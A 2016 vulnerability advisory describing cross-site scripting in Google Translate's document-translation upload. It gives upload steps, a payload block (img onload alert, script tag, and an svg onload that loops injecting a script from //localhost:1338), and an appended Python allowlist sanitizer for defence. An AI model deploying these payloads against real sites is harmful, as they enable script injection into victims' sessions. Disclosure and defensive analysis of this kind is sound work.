Google Translate XSS [Cross Site Scripting]

Published: 2016.08.17
Credit: Jonatas Fil
Risk: Low
CWE: N/A
CVE: N/A
Local: Yes
Remote: No

[+] ~ J0nshu4w - Security Research and pentester. [+]

[*] I'm a security researcher and found a sandbox failure. It consists of Cross Site Scripting, where I can send alerts and inject eval code, text and images using the <img> tag.

[!] Tested on Windows / Linux / MacOS: Firefox, Chrome and Opera. [!]

Ok Go!

[!] To explore it open Google Translate


[*] https://translate.google.com.br
or
[*] https://translate.google.com

[!] Just below, you have the option:
[!] "Translate Document"

[*] In this parameter we will inject XSS.

[*] Create a .html or .htm file.

[*] In it we will put malicious code [XSS] using the <img> tag.

[+] My exploit for example: [+]
######################
<img src="http://i793.photobucket.com/albums/yy213/gilbef/GIFBRAZIOL.gif"
onload="alert('xss by j0nshu4w')">
<marquee><h1>xss is vuln by j0nshu4w</h1></marquee>
<script>alert(document.domain)</script>
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)>
####################

[*] After you have saved it, select the file in the document translation options and click Translate.

[#] After this, the XSS runs successfully :D [#]
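
[*] The issue above comes down to an uploaded HTML file keeping its event-handler attributes and script elements when the result is rendered. The following is an added example, not code from this advisory or from Google: a server-side allowlist filter that rebuilds the upload from permitted tags and attributes only; the allowlist, the names and the constructed sample are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for a document-translation view: text markup, links, images.
ALLOWED_TAGS = {"p", "br", "b", "i", "h1", "h2", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://")   # enforced on href and src values
DROP_CONTENT = {"script", "style"}       # element text must not survive either

class UploadSanitizer(HTMLParser):
    """Rebuilds an uploaded HTML file from allowlisted tags and attributes only."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.removed, self.skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        if self.skip or tag not in ALLOWED_TAGS:
            self.removed.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            bad_url = name in ("href", "src") and not value.lower().startswith(SAFE_SCHEMES)
            if name not in ALLOWED_ATTRS.get(tag, ()) or bad_url:
                self.removed.append(f"{tag}@{name}")   # e.g. onload, javascript: href
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT and self.skip:
            self.skip -= 1
        elif not self.skip and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))   # text is always re-escaped

def sanitize(document):   # returns (clean_html, audit list of stripped items)
    parser = UploadSanitizer()
    parser.feed(document)
    parser.close()
    return "".join(parser.out), parser.removed

# Constructed sample shaped like the advisory's test file.
SAMPLE = ('<img src="https://example.com/a.gif" onload="alert(1)"><marquee><h1>hi</h1>'
          '</marquee><script>alert(document.domain)</script><svg/onload=alert(1)>ok')
```

[*] Rendering the filtered result from a separate origin that holds no session cookies limits the impact if the filter misses something.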


DEMO:

http://imgur.com/a/XLzd4


######################
Made In Brazil 1337

[+] ~ J0nshu4w - Security Research and pentester. [+]

Facebook: /jonatasfil
Github: /ninj4c0d3r
Youtube: /c/jonatasfil



Copyright 2017, cxsecurity.com